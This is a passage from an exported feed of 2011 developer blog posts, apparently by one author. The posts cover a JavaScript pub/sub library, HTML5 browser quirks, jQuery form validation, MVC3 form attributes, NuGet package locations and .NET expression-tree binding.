sub.\nLet me start by saying that this isn’t the first time I have blogged about pub/ sub, it’s also not the first time I’d written one, but essentially I wrote the following code snippet on stage for the audience:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 (function() { var cache = {}; function pub(name, args) { if(!cache[name]) { cache[name] = { subs = [] } } for(var i=0, il=cache[name].subs.length; i<il; i++) { cache[name].subs[i].apply(null, args); } }; function sub(name, fn) { if(!cache[name]) { cache[name] = { subs = [] } } cache[name].subs.push(fn); }; this.pubsub = { pub: pub, sub: sub }; })(); The code is short and to the point and with the addition of some error checking in it you could probably use that in a live environment.\nPost-DDDAfter the conference I decided that I wanted to revisit how write pub/ sub and essentially scrap the library I last wrote and write it again (for the record I know there are plenty of existing JavaScript pub/ sub libraries out there already, but mine will be cooler, just read on :P).\nBut something else I wanted to do, and use this project as a sandbox for it, was learn more about Coffeescript. If you haven’t heard about Coffeescript but are doing a lot of JavaScript then I suggest you give it a look. Essentially it’s a language on top of JavaScript which aims to remove some of the syntax guff that exists, turning JavaScript into a language that is very similar to Ruby.\nSo I decided to start a new project, this would be called [Postman][4] that handles sending and receiving messages.\nHello Mr PostmanSo Postman is available on my github repository and at the moment I’m quite happy with its feature set. Like a good pub/ sub library you can send and receive messages, like so:\npostman.receive('some-message', function(args) { //handle 'some-message' }); postman.deliver('some-message', ['foo', 'bar']); So with the receive method you can add your handlers (sub), and with your deliver method will fire messages (pub). So yes, nothing different to your standard pub/ sub except for the fact that it has a quirky syntax.\nPostman also has the ability to change methods, every method returns the Postman so he can chain up his operations:\npostman.deliver('message1').deliver('message2'); Making the Postman smartRemember that I said Postman was going to be the coolest pub/ sub library and you should use it above all others? Well there is actual a feature that I have included that I haven’t seen in many other libraries and that’s the idea of a message bus.\nMessage Bus 101 The idea of turning a pub/ sub into a message bus came to me in a recent project at work where we were using pub/ sub quite extensively but we have a bit of an issue, we couldn’t ensure that the subscriptions were happening before the publishing was done. This meant that we could have components on our page not receiving the messages and this can be a real issue for us.\nWith a message bus though we actually track all the messages that were previously published and when a subscriber attaches its callback function it will receive the previously published messages.\nThat means that we can do the following:\npostman.deliver('message'); //some other code postman.receive('message', function() { console.log('message was received'); }); How it works Internally what Postman does is tracks every deliver method call and the arguments provided to it and when ever a receive call happens it will iterate through the delivery history and then call the callback with each of the history point.\nUsefulness of a Message Buss So now that you’ve seen that with Postman we can not only publish and receive messages using a known order of execution you can see that we’re also allowing an unknown order of execution to happen and our messages are still going to end up at the required destination.\nTold you it would be cool ;).\nSomething else that Postman exposes from its API is a way to get rid of messages. If you’re building a long-running JavaScript application you may find a point where messages reside in the history much longer than you’d like them to, and future subscribers might not care about the state of the application back when the messages first were published. It’s also important for memory management, you don’t want large JavaScript objects sitting in memory if you don’t really need them there. So what Postman does is exposes a method called dropMessages and we can use the method like so:\npostman.dropMessages('some-message'); Postman will then remove all the call history for the passed in message name. As cool as this is it might be important to drop messages conditionally. To do this Postman allows you to not just pass in a message name, but a criteria which determines the messages to drop.\nThe criteria that you pass in can be either a function or a date, so you can determine which messages to drop using logic (say if you wanted to drop based on the args that it received) or drop messages older than a certain date.\nIf you use a function to drop messages it’ll take a callback that internally get’s passed to the [Array.map][7] function, so make sure that you implement it to take those arguments, with the element value being a JavaScript object matching the following schema:\n{ args: [], created: Date, lastPublished: Date } The args property is the arguments that passed into the message (an empty array if you don’t provide arguments), created being a date object which is when the message was raised and lastPublished was when the message was last sent to the a callback.\nLastly when you call the receive method you can pass in an optional third argument which indicates whether the history will be ignored or not. By default history wont be ignored but if you’re doing a subscription that you don’t want the history provided to it you can use it like so:\npostman.receive('some-message', function() { }, true); Tests Something else I decided to do with Postman was to ensure that it does actually work as advertised. To do this I’ve gone about writing a test suite which you can find here. A lot of people neglect testing when writing JavAScript, but I think it’s quite important to at the very lest sanity check your own API. I’ve used Qunit and it’s super simple to write out the tests. Fire up the html in the browser and you’ll see just how the tests themselves pass ;).\nNode.js The final goal of Postman was to be entirely unreliant on the DOM so that you could run it in a server-side JavaScript implementation such as Node.js. I’ll try and get this popped up on npm so if you want to use it in your Node projects it’ll be nice and easy.\nConclusionSo this wraps up my introduction to Postman. As I said pub/ sub is a pattern that is done to death but I hope that this library has a few features which make you choose it over the myriad of existing pub/ sub libraries out there ;).\n", "id": "2011-07-02-postman" }, { "title": "This post is best viewed in some other browser", "url": "https://www.aaron-powell.com/posts/2011-06-08-best-viewed-in-some-other-browser/", "date": "Wed, 08 Jun 2011 00:00:00 +0000", "tags": [ "html5", "opinionated" ], "description": "", "content": "Does everyone remember the good old days of when websites had the introduction\nThis website is best viewed in 800x600 and Internet Explorer 5\nNo? We’ll you missed the ‘good old days’ of the browser wars which saw the different browser vendors supporting different features which resulted in web developers having to pick and choose what browser(s) their websites would work in.\nFast forward a half dozen years and we end up in 2011 where we see a new browser war going on and this time the focus is on HTML5. With the browser vendors turning out new versions at a speed we haven’t seen in a long time, 8 to 12 weeks for IE, 12 weeks for Chrome and 14 weeks for Firefox, the features available in each browser can (and often are) different.\nTake for the example the HTML5 input types, most specifically the the date picker. For years we’ve been using plugins for our favorite JavaScript library to create date pickers so it was only natural that the browsers would evolve to having built in. But there’s a problem, only some browsers do support them.\nThis isn’t a huge issue because through tools such as Modernizr we can detect if a browser does or doesn’t support it and use a polyfill or shim to patch the gaps. Awesome, but what if the browser has partial support? For example at the time of writing the current version of Chrome is 12.0.742.91 (Official Build 87961) running WebKit 534.30 (branches/chromium/742@88085) and it supports <input type="date" />, but it only has partial support. Here’s how it looks:\nIn fact Opera is the only browser that has full support for it.\nBut that’s fine, as I said before we can use a polyfill to add the date picker, only there’s a problem. Because the partial support which the WebKit engine has kind of has a date picker but kind of doesn’t you still end up with the scroll bar on the side. Additionally you can’t change the format of the date that you’re entering.\nAnother interesting fact is that the <input type="number" /> in this build also appears to be miss-implementing the HTML5 spec and inserting a comma every three digits.\nThere was also the saga about Web Sockets spec changing and potential security holes (which saw Firefox disabling them by default).\nAnd this brings me back to my original question, are we going back to the days when the differences between the browsers are holding us back from doing what we need to in complex web applications or are polyfills and shims going to save us from another generation of websites which work best in some other browser?\n", "id": "2011-06-08-best-viewed-in-some-other-browser" }, { "title": "Adding data attributes to MVC3 forms with HtmlHelpers", "url": "https://www.aaron-powell.com/posts/2011-05-26-data-attribute-mvc3-forms/", "date": "Thu, 26 May 2011 00:00:00 +0000", "tags": [ "mvc3", "asp.net-mvc" ], "description": "", "content": "In a site I’m working on I wanted to add a data attribute, you know, data-*, to a form that was being generated from a controller action in MVC3. So I have the code like this:\n@using(Html.BeginFor("Index", "Home", FormMethod.Posts) { <!-- form contents --> } Now I want the form to be opening in a new window, but I’m a good developer and I don’t like littering my code with target="_blank", instead I have some jQuery that I’m using to detect elements that are to go into new windows and adding the attribute programmatically.\nI want to run this jQuery method:\n$('form[data-external=true]').attr('target', '_blank'); But I was stumped, how do you add data-external to the form? The HtmlHelper does allow you to pass in attributes, but they are done through an anonymous .NET object, and - isn’t valid in a member name in C# (it is in the CLR though), so this code doesn’t complie:\n@using(Html.BeginFor("Index", "Home", FormMethod.Posts, new { data-external = "true" }) { Good thing is that the MVC team have already got this sorted, instead of a hyphen you can use an underscore:\n@using(Html.BeginFor("Index", "Home", FormMethod.Posts, new { data_external = "true" }) { Now you’ll get a form like this:\n<form action="/home/index" method="post" data-external="true"> Hopefully this will prove handy for someone else too.\n", "id": "2011-05-26-data-attribute-mvc3-forms" }, { "title": "jQuery validation, JavaScript form submitting and another bad idea", "url": "https://www.aaron-powell.com/posts/2011-05-21-jquery-validation-and-javascript-posts/", "date": "Sat, 21 May 2011 00:00:00 +0000", "tags": [ "jquery", "javascript" ], "description": "", "content": "In my last post I looked at how to use jQuery validation in a dynamic form and some problems you can have with handling rule sets.\nSomething I mentioned in the posts was that I was also submitting the form using JavaScript rather than a form post or anything. This didn’t actually make it into the final post and part of the reason was it would have added a heck of a lot more to the overall post, making it a lot longer than I think anyone would want to read. The other part of the reason was I started writing the post at 11pm on Friday night and finished it on Saturday night so I may have got a bit sidetracked :P (even though I did proof read it I missed that part!).\nSo as promised here is the conclusion to my last post :P.\nSubmitting forms with JavaScriptWhen submitting a form with JavaScript there’s a few ways you can go about it, one of the ways is to use an AJAX request on the form submit, so basically serializing the form fields into a JSON blob which you include in your POST.\nThis is good because you can do progressive enhancement since you have an actual URL to POST to if JavaScript is disabled.\nBut no, we’re not going down that route, instead we’re going to be calling a JavaScript method on our external API. This poses some problems, we don’t have URL to submit to. But we still have a <form> tag, so we’ve got an issue, we have to avoid the form submit!\nfunction postForm(validation, form) { var fields = form.find('input'), data = {}; for(var i=0, il=fields.length; i<il; i++) { var field = fields[i]; data[i] = { value: $(field).val(), type: $(field).attr('type') }; } external.submit(data); } Great, that was pretty easy to build up our submit schema, so we can hook it up into jQuery Validation:\nfunction buildForm(form, fields) { var fieldset = form.find('fieldset'), ol = $('<ol></ol>'), templates = { text: $('text-template'), date: $('date-template') //and so on for more templates }, rules = {}, messages = {} settings = { rules: rules, messages: messages, submitHandler: function postForm(validator, form) { var fields = form.find('input'), data = {}; for(var i=0, il=fields.length; i<il; i++) { var field = fields[i]; data[i] = { value: $(field).val(), type: $(field).attr('type') }; } external.submit(data); } }; //parse form code from the last post //update this line to use our object not the inline object $.extend(validationRules.settings, settings); } So I’ve updated the code from the last post which now includes the submitHandler property on the settings for the validation rules. This is a method that will be called once the form passes all validation rules that have been applied to it.\nThis is a fine piece of code, it works exactly as we would expect, except there’s an issue, the form will still post.\njQuery Validation works by tying into the form submit event, and the submitHandler method is called as part of that, so if all validation passes it’ll allow the browser to finish executing the submit operation. This is a problem, we’re not defining an action or a method and according to the W3C spec the default action is the URL of the forms owner and the default method is GET. Crap, so even if we don’t specify anything it’ll still have some default operations.\nBut it’s not really a problem, we can just use the preventDefault method to stop the event from continuing because if we can stop the event from going on we don’t have to worry about the form submitting completely.\nWell that’s good, but we have a problem, how do we cancel the event? Sadly the submitHandler method has no access to the form event object. According to the source though we can pass in debug: true as a setting to the validator which will then calls preventDefault, but that looks ugly, having debug: true in production code…\nSo the only solution is we modify the source for the validation plugin. Good news is I have modified the jQuery Validation plugin, I have a fork here which I hope the pull request of gets accepted ;).\nNow we update our submitHandler method:\nsubmitHandlers: function postForm(validator, form, event) { var fields = form.find('input'), data = {}; event.preventDefault(); ConclusionSo to wrap up the second part of the intended one-part series we’ve looked at how you can work around using JavaScript to send data and still prevent a browser from submitting the data.\n", "id": "2011-05-21-jquery-validation-and-javascript-posts" }, { "title": "jQuery validation, dynamic forms and a really bad idea", "url": "https://www.aaron-powell.com/posts/2011-05-20-jquery-validation-and-dynamic-forms/", "date": "Fri, 20 May 2011 00:00:00 +0000", "tags": [ "jquery", "javascript" ], "description": "", "content": "Currently at work I’m part of a team that’s developing a really JavaScript heavy application and in doing so we’re finding problems, challenges and solutions. One such that I was working on recently I thought I’d share with you as it was a majour source of frustration, but ultimately I succeeded in it and that made it all the worth while!\nThe section of the application I’ve been working on deals with an external data source which manages some systems that the user interacts with. We don’t have any C# code that supports this section of the application, everything is provided by a third party and a JavaScript API which they have provided us with for interaction. This means that whenever we need display something to the user they are providing us with the data. Generally speaking this is fairly straight forward, they are providing lists of data, messages, etc, but there’s one step that is quite tricky, and that is developing a form.\nSo to set up the scenario what we are running through a multi-part form. On the first step of the form we give the user an option of what they want to add and then on the second step we display a form with a number of fields. The thing is that these fields are defined by the option chosen on step 1, meaning that we have to generate the form on the fly. Breaking it down what we’re getting back from the external API is a JSON object which represents a form schema. It dictates the fields we’re including, the order they appear in and the types of inputs. To then throw another spanner in the works the fields all need to be validated. Each field is mandatory and we have some special fields such as date fields.\nEssentially I have to take this:\n{ fields: [{ type: 'text', label: 'First Name' }, { type: 'text', label: 'Last Name' }, { type: 'date', label: 'DOB' }] } And turn it into the following:\n<form> <fieldset> <ol> <li> <label for="field-0">First Name</label> <input id="field-0" name="field-0" type="text" /> </li> <li> <label for="field-1">Last Name</label> <input id="field-1" name="field-1" type="text" /> </li> <li> <label for="field-2">DOB</label> <input id="field-2" name="field-2" type="date" /> </li> </ol> </fieldset> <button type="submit">Submit</button> </form> Now let’s have a look at how you generate a form from a JSON schema, display it to the user and ultimately configure some validation.\nOh, and to cap it all off we don’t actually have a .NET method which we’re posting the form to, there’s no ASMX, no Controller Action, no PostBack. Instead we’re submitting the form back into a JavaScipt API call which our external service is providing to us!\nGetting startedWhen getting started with these we already had a lot of design patterns in place and JavaScript libraries to play with. For the purpose of this blog post I’m going to look at the tools which are relivent to what I’m doing and which will (hopefully) save you some time if/ when you have to do something similar.\nThese tools are:\njQuery (duh!) jQuery Validate jQuery Templating Building your formSo I’m going to be building out my form based on a JSON schema, but I want to do it in such a way as that I don’t have any “magic strings” which are responsible for DOM element creation. I’m trying really hard to keep a good clean separation between the HTML and the JavaScript so littering my parser with HTML snippets kind of throws off my concept a bit.\nInstead though I’ve decided to take a different route, I’m going to use the fantastic jQuery template enging to create the form fields to begin with. If you’re not familiar with the jQuery Templating enging then I suggest reading their docs before going much further and getting confused.\nNow my schema will only support a sub-set of form fields, so I don’t need to worry about having a solution for every different scneario, instead I’m catering for the following:\nRegular text fields Password fields Date fields Checkbox fields So for this I’m going to create separate templates for each of the form field types that are supported:\n<script type="text/x-jquery-tmpl" id="text-template"> <li> <label for="field-${index}">${label}</label> <input id="field-${index}" name="field-${index}" type="text" /> </li> </script> <script type="text/x-jquery-tmpl" id="text-template"> <li> <label for="field-${index}">${label}</label> <input id="field-${index}" name="field-${index}" type="password" /> </li> </script> (And so on, I wont put out all the templates here, it’ll get a bit repetative)\nYou could go about this a slightly different way and put conditional statements in your template. Personally I’m against that for a few reasons:\nYou end up with larger and potentially more complex templates Template parsing has an overhead. The more logic you put into a template the more slower it’ll become to parse as the regexs have to work that bit harder You’re loosing your separation of concerns but bringing JavaScript into your templating engine Since we’re only templating our form fields we’ve got t ohave a starting HTML snippet that we’ll be appending to:\n<form> <fieldset></fieldset> <button type="submit">Submit</button> </form> Parsing our schemaSo now we know how we’re going to go about building our HTML we now have to parse our schema. It’s a fairly simple concept, we need to:\nItterate through each field in the response Determine the type Parse the template with the field info Let’s assume that we’ve made it to the wizard step that we’ve called out to our external service to provide the JSON schema, now we’ve got to deal with it.\n(function($) { $(function() { //call out to our external API external.getForm('form-identifier', function(result) { //this callback will handle the parsing buildForm($('form'), result.fields); }); }); })(jQuery); This is a fairly simple little code snippet, we’re expecting to call our external API which will in turn send us our JSON schema. Now let’s implement the buildForm method.\nfunction buildForm(form, fields) { var fieldset = form.find('fieldset'), ol = $('<ol></ol>'), templates = { text: $('text-template'), date: $('date-template') //and so on for more templates }; for(var i=0, il = fields.length; i < il; i++) { var field = fields[i], field.index = i, //so we've got a unique ID for the field html = {}; switch(field.type) { case 'text': html = templates.text .tmpl(field) .appendTo(ol); break; case 'date': html = templates.date .tmpl(field) .appendTo(ol); break; default: throw new Error('The field type "' + field.type + '" is not supported.\\r\\n" + JSON.stringify(field); } } ol.appendTo(fieldset); } Now this is really simple code, we’re defining some variables up front which will be needed, and also some pointers to our templates (because caching jQuery selectors is a very good idea people!). Next we go through each item in the fields collection, find the right template and then apply the field to it.\nPro tip - templates aren’t just for dealing with collections, you can apply a single JavaScript object to it.\nOnce we’ve build up a full form it wil then be added to the DOM, this is just for athetics, rather than appending each one to the DOM as you loop through it does it in a single go. This means you can have some fun animations if you want to make the form appear, rather than a staggered approach if you were adding to the DOM as you go.\nEssentially we are done, the JSON schema has been parsed and we’ve now got a form which the users will see and be able to work with. It’s also surprisingly easy to do.\nAdding validationAs I mentioned in the introduction to the article the fields need to be validated as well. Depending on how you’re getting your JSON schema you may receive the validation down the pipe as part of the schema, but in this example I’m going to have all fields validated.\nOne thing to note, I’m assuming that this code is in run in an ASP.NET MVC3 application, so I’ve got the unobtrusive jQuery validation also included which has an interesting side effect, it parses all forms and tries to set up the validation rules. But sadly we don’t have the form built so the validation rules can’t get created!\nBecause we’ve got unobtrusive validation included and it’s already parsed our form it poses a bit of a problem, when you pass your rules into the validate method it wont do anything. When the plugin runs it adds a data attribute to the form which contains all the rules ($('form').data('validator') is where it is). This is problematic, we can’t revalidate the form if we put unobtrusive rules on it.\nBuilding validation rules Although we may not be able to go with the unobtrusive validation it’s not a big issue IMO, we’re already being unobtrusive by running out JavaScript to build the form in a separate file (you are doing that right…), so we can just build up the rules as we’re parsing our schema:\nfunction buildForm(form, fields) { var fieldset = form.find('fieldset'), ol = $('<ol></ol>'), templates = { text: $('text-template'), date: $('date-template') //and so on for more templates }, rules = {}, messages = {}; for(var i=0, il = fields.length; i < il; i++) { var field = fields[i], field.index = i, html = {}, id = 'field-' + i; rules[id] = { required: true; //setup the rule for this field, we're just putting required as true }; messages[id] = { required: 'The field is required' //create a message for when the field is invalid }; switch(field.type) { case 'text': html = templates.text .tmpl(field) .appendTo(ol); break; case 'date': html = templates.date .tmpl(field) .appendTo(ol); rules[id].date = true; messages[id].date = 'That\\'s not a valid date'; break; default: throw new Error('The field type "' + field.type + '" is not supported.\\r\\n" + JSON.stringify(field); } } ol.appendTo(fieldset); //wait, how do we add the rules? } In the above we’ve added a few new variables, one which will hold our ruleset and one which will hold the messages. Each rule is based off the name (or ID, I forget which) of the form field, so I’ve created a variable in the loop that’s the ID. You could then add this to the field object and have the template parse it rather than having duplicate code (but I’m lazy and it’s not overly exciting so I’ll skip it :P).\nNow though we have all our rules made how do we go about adding them? As I mentioned the form has already been parsed thanks to the unobtrusive validation plugin, so when we do this:\nform.validate({ rules: rules, messages: message }); Nothing happens…\nWell actually something useful happens, when you do call validate it’ll return the validation rules.\nRules which we can modify ;).\nThat’s right, we don’t need to “parse the form” again, we can just modify the ruleset that’s already there, so we’ll update our code:\nfunction buildForm(form, fields) { var fieldset = form.find('fieldset'), ol = $('<ol></ol>'), templates = { text: $('text-template'), date: $('date-template') //and so on for more templates }, validationRules = form.validate(), rules = {}, messages = {}; for(var i=0, il = fields.length; i < il; i++) { var field = fields[i], field.index = i, html = {}, id = 'field-' + i; rules[id] = { required: true; //setup the rule for this field, we're just putting required as true }; messages[id] = { required: 'The field is required' //create a message for when the field is invalid }; switch(field.type) { case 'text': html = templates.text .tmpl(field) .appendTo(ol); break; case 'date': html = templates.date .tmpl(field) .appendTo(ol); rules[id].date = true; messages[id].date = 'That\\'s not a valid date'; break; default: throw new Error('The field type "' + field.type + '" is not supported.\\r\\n" + JSON.stringify(field); } } ol.appendTo(fieldset); $.extend(validationRules.settings, { rules: rules, messages: messages }); } Up front we’ve defined another variable which will hold our existing validation information and then at the tail of the method we’re using the $.extend method to add our new rules to the existing rules. Well the be specific we’re passing the validationRules.settings property, as that’s actually where the rules (and messages) reside, not on the root object.\nAlternate way to build up rules Part of the jQuery Validate plugin is it adds a rules method onto the jQuery objects, this means you can add rules that way. The problem I’ve found with this though is if the input field isn’t in the DOM you can’t use the rules method since internally it’ll look back up the DOM for the form they are attached to, but there’s no DOM to walk yet so it’ll throw an error.\nConclusionThis has been a fairly full-on article, we’ve looked at:\nHow to use jQuery templates to build a HTML snippet How we can parse a JSON schema for a form How to extend the existing validation rules to support new rules from the schema Hopefully this has given a bit of an insight into how to do some crazy, way out problems, but also how to do some more real-world scenarios such as updating an existing from with JavaScript and then augmenting the validation rules.\n", "id": "2011-05-20-jquery-validation-and-dynamic-forms" }, { "title": "REMIX 11", "url": "https://www.aaron-powell.com/posts/2011-04-28-remix11/", "date": "Thu, 28 Apr 2011 00:00:00 +0000", "tags": [ "remix11" ], "description": "", "content": "I’m going to be speaking at REMIX11 this year, I’ll be presenting Chasing the evolving web: things you need to know to be a modern web developer.\nSo get yourself a ticket and come watch the show, REMIX is 1 - 2 June and you can register here.\n", "id": "2011-04-28-remix11" }, { "title": "It’s CodeGarden time!", "url": "https://www.aaron-powell.com/posts/2011-04-27-it-s-codegarden-time/", "date": "Wed, 27 Apr 2011 00:00:00 +0000", "tags": [ "codegarden", "umbraco" ], "description": "", "content": "Well it’s that time of year again, the time when CodeGarden is coming back!\nAs is tradition I’ll be in attendance (3rd year running) and representing a new employer (although I’m not sure if that’s such a good tradition to have upheld…).\nThis year I’ll be doing two sessions, first is on day 2 entitled Collaboration in Umbraco and I’ll be talking about how the move from TFS to Mercurial has helped Umbraco grow as well as some other practices that we employ to keep Umbraco as one of the top open source projects in the ASP.NET space. My second session will be co-presented with Alex Norcliffe and is entitled 0 to Hive in 45 where we’ll be going on a crazy journey into the depths of the Umbraco v5 API and look at how to plug in your own data model. I’m really excited about this session and hopefully we’ll be able to keep a good amount of it under wraps so that we can totally blow your mind on the day!\nOther than this you’ll find me milling around the various sessions, helping out in the hands on labs and just generally causing trouble ;), so feel free to say hi!\n", "id": "2011-04-27-it-s-codegarden-time" }, { "title": "Why do you care where your packages are?", "url": "https://www.aaron-powell.com/posts/2011-04-27-why-does-package-location-matter/", "date": "Wed, 27 Apr 2011 00:00:00 +0000", "tags": [ "nuget" ], "description": "Warning - the following is an opinionated piece and based on my experience. It doesn't reflect that of any of my employers or of any sane human beings", "content": "As a consultant I’ve had an opportunity to see the way different project manage their external dependencies, and being an active member of in open source projects has given me a good view on this as well. From all this I’ve noticed an interesting trend, there’s no agreed standard for where to put external dependencies.\nAt previous companies I’ve worked with structures like a folder above the solution root called lib, a dll folder at the root of the solution or a common folder on the file system which every project gets its assemblies from.\nOpen source projects are much better, FunnelWeb has both a lib folder (above solution root) and the NuGet packages folder, WebForms MVP has a Dependencies folder and a NuGet one, where as Umbraco 4.7 has a foreign dlls (at solution root) and Umbraco 5 has Resources/References above the solution root.\nSo as you can see there’s not a lot of commonality between projects, and the more projects you sample the more you’ll see this trend; some overlap by generally speaking each project has its own flavor. Even Umbraco doesn’t keep it consistent between the two versions (yes this can be argued with the legacy nature of 4.x but it’s a bit of a weak excuse, they are drastically different).\nA look at other communities Over the last few months I’ve been playing around with both Ruby and Node.js and one of the first things you’ll notice when working with these technologies is that this confusion doesn’t exist.\nIt wasn’t until a few months after I started with these technologies that I actually learnt where external dependencies actually exist on your computer, and there’s a really good reason for that.\nTake Ruby for example, Ruby has had the gem tool for a long time and you use gem to download an open source library and include it into your project. Say I want to build a site using Sinatra, I run:\ngem install sinatra Now I have Sinatra on my machine (assuming I didn’t previously) and I can include it into my project. If I throw my project up on GitHub and someone else grabs it they can install the gems I required themselves (or not if they already have them). And if I’m a really proactive developer I can create a Gemfile file and they can use bundler to install all the gems I specified. But where these gems install to is not important, in fact you’re encouraged to not care by the fact that there is no feedback regarding that in gem install process.\nNoe.js has a similar story using npm, and it works in a similar manner, you install packages but dont’ concern yourself as to where they actually go on disk.\nThen there was NuGet So what we’ve seen with Ruby and Node.js is that the focus around a package management tool really helps getting around the problem of where to put your dependencies. As is often the case .NET is late to the party, but now it’s here with its shiny new tool, NuGet.\nWhen you work with NuGet you find that it has a very gem-like feel to it, when you install a NuGet package it doesn’t tell you where the file(s) end up on disk, they just end up somewhere. Well it turns out that it’s not very hard to work out where they were, they reside in a packages folder existing at the level of the solution. This is not quite as nice as the global gem or npm, it’s still including them in the scope of a particular project, but to an extent you can see why it is this way, the Visual Studio tools probably needed an easy way in which they can find somewhere that is scoped to the solution.\nFantastic, with NuGet we’ve now got one less thing that’ll be different between .NET projects (there’s still coding standard, project naming, etc to deal with :P), right… right? Well apparently not. While having a browse around the NuGet issue list I noticed that the top-voted NuGet issue is on this topic, that the package location should be customizable.\nThis smacks of developers thinking that they don’t like change. That they have always done something some way and that it should always be done that way. Don’t get me wrong, I’m not saying that the NuGet packages folder is perfect and that we should just blindly follow it, I’m just saying that it doesn’t matter, it can be in a folder at the root of the solution, in a folder in a users Documents folder or hard-coded into the Windows directory, it shouldn’t matter.\nConclusion .NET developers often get hung up on doing it their way and not being willing to change. One such hang up is the location of external references, but it shouldn’t matter, let the package manager dictate it for you and have one less standard that you are maintaining for yourself.\n", "id": "2011-04-27-why-does-package-location-matter" }, { "title": "I can haz MVP", "url": "https://www.aaron-powell.com/posts/2011-04-03-mvp11/", "date": "Sun, 03 Apr 2011 00:00:00 +0000", "tags": [ "mvp" ], "description": "", "content": "Incase you don’t follow me on twitter you may have missed the annoncement over the weekend that I’ve been awarded my first Microsoft MVP award, for Internet Explorer (Development)!\nStay tuned for all things awesome web :D.\n", "id": "2011-04-03-mvp11" }, { "title": "Fun with Expression Trees and property binding", "url": "https://www.aaron-powell.com/posts/2011-03-30-binding/", "date": "Wed, 30 Mar 2011 00:00:00 +0000", "tags": [ ".net", "c#-4", "expression-tree-fun" ], "description": "", "content": "The client I’m currently working for is using an MVP pattern with WebForms (not WebFormsMVP but an internally developed one) which is using an active view pattern. What this means is that the model contains all the data for both incoming and outgoing requests.\nSay a button click happens, the form posts and the model is updated with the data of the input fields, which the presenter then takes over.\nThis results in a lot of code like this:\ntxtFirstName.Text = Model.FirstName; txtLastName.Text = Model.LastName; Or this:\nModel.FirstName = txtFirstName.Text; Model.LastName = txtLastName.Text; One of the developers here had finally got sick of typing out model binding code and decided to implement model binding like this:\nBindings.Add(new Binding { Data = () => Model.FirstName, Ui = () => txtFirstName.Text, Direction = BindingDirection.ReadWrite }); Now this is a pretty neat solution and it solved the problem for the most part. Internally it’s using Expression Trees, but it makes two very crutial expectation, Data can only come from Model.PropertyName, meaning you can really work with indexers, etc and Model.PropertyName will return a class not a struct.\nI decided that I wanted to use it for something a bit different, I wanted to bind a boolean value to a check box. Unfortuantely this doesn’t work as the boolean Expression Tree fails with the expectations listed above.\nThinking that there must be another way to go about this I decided to have a bit of a play around with Expression Trees myself and came up with the following idea.\nNote - this isn’t actually the code we’re using here. We have a .NET 3.5 application and the following code only works in .NET 4.0 due to some changes/ improvements of Expressions Trees.\nA quick note on .NET 4.0 Expression Trees If you haven’t really dug around much with Expression Trees in .NET 4.0 you may not be aware that they actually evolved a lot in the new CLR, in fact the .NET 4.0 version is not really an Expression Tree any more, it’s actually a Statement Tree and it’s scarily close to a full blow Abstract Syntax Tree (AST). Bart De Smet has two really good blogs on the topic, a look at the new Statement Trees and some ways to reduce the pain.\nBut if you’re not into reading those posts the high level view is that in .NET 4.0 you can actually produce Expressions which are more like methods. You can create IfThen statements, variable declarations, loops, etc. And that’s pretty cool in my book!\nBack to binding So back at our original experiement I wanted to work out a way I could take the data and the ui, hook them up with an expression to support two-way binding. With .NET 4.0 you can do that really bloody easy since there is an Assign expression which we can play with.\nAssign works like this:\nExpression.Assign( target, source ); This means you can do something like this:\nExpression.Assign( () => foo.Bar, Expression.Constant("bar") ); What this will do is create an expression which looks like:\nfoo.Bar = "baz"; Fantastic :D\nBut let’s step back a bit and flesh out a more complete example. First off I need to create some variables to bind:\nvar foo = new Foo(); var foo2 = new Foo {Bar = "baz"}; Now we’ll create some expressions:\nExpression<Func<string>> exp1 = () => foo.Bar; Expression<Func<string>> exp2 = () => foo2.Bar; When you start breaking apart the expression trees above what you’ll find that you have is an expression which has a body of type System.Linq.Expressions.PropertyExpression (which is an internal class!) and if you want to try and break it apart you’ll be able to find out the variable you’ve accessed the property on, as well as the property accessed.\nWhat’s cool about a PropertyExpression is that we can do things such as read or write from the property. So now we’ll create our assignment expression:\nvar binder = Expression.Assign( exp1.Body, exp2.Body ); Here we’re passing in the body of the expression (our PropertyExpression) as both the source and the target, which will result in C# like this:\nfoo.Bar = foo2.Bar; Note - you can’t really get the C#, it’s not possible as all it really can generate is IL and metadata.\nSo there you go, basic binding done. It’s time to compile and ship it!\nFirst create a lambda for us:\nvar lambda = Expression.Lambda(binder); Compile the lambda into a Delegate:\nvar func = lambda.Compile(); Execute the delegate:\nfunc.DynamicInvoke(); Console.WriteLine(foo.Bar); //baz You can then update foo2 and recall the delegate:\nfoo2.Bar = "Hello World!"; func.DynamicInvoke(); Console.WriteLine(foo.Bar); //Hello World! Conclusion This above code is actually not tied to WebForms, or any particular UI of .NET, you could use it in anything that supported the .NET 4.0 expression trees.\nKeep in mind that this is a thought expermiment and I haven’t exactly done a lot of testing of the code. All I know is that it worked in my basic tests :P. Since we’re using .NET 3.5 at this client I’m not able to actually put it into the framework, so I’m just leaving it here as a thought experiement.\nIf you’re interested in the full code it is here.\n", "id": "2011-03-30-binding" }, { "title": "An uninformed overview of NuGet", "url": "https://www.aaron-powell.com/posts/2011-03-28-an-uninformed-overview/", "date": "Mon, 28 Mar 2011 00:00:00 +0000", "tags": [ "nuget" ], "description": "", "content": "In case you’ve been living under a rock for the last few months you should have heard about NuGet, and if you have been here’s the abridged version.\nNuGet is a package manager for .NET projects. Basically think Ruby Gems, NPM for Node.js, etc and you’ll come up with NuGet for .NET.\nNuGet isn’t the first attempt at a unified package management system, OpenWrap was here first, but it didn’t seem to have the reach that NuGet seems to have (yes this could be because you’ve got the official Microsoft stamp of awesome, lots more Microsoft shills blogging about it, etc), but that shouldn’t be important, what’s more important is there is actually a package management story for .NET now.\nHow does NuGet work though? Well NuGet is made up of two parts, first there is the NuGet Gallery which packages are uploaded, packages can be downloaded, etc. This is data provided to connecting clients using OData (which allows cool things like querying with LINQPad). You can also create your own NuGet server using the NuGet.Server package.\nConsuming NuGet can be done a couple of ways. As mentioned above you can use an OData reader such as LINQPad. You can write your own consumer that uses the NuGet.Core package (which I covered in detail in this post) or you can use the Visual Studio 2010 tool.\nThe Visual Studio tool also include a set of Powershell scripts which mean that you can call out to NuGet from Powershell, although I’m not entirely sure how well it’d work outside of Visual Studio as it does seem to use some of the VS API to add references to a project. But the Powershell tools are cool, they allow you to do things like this.\nWhat makes up a NuGet package A NuGet package, or nupkg file, it really just a ZIP file with a manifest within it. The nuspec format is documented and can easily be implemented. The way the files are treated has also been documented and most of it is based off of conventions. Really the main two you need to know are:\n/lib files go into the project references /Content files go into the root of the project (and 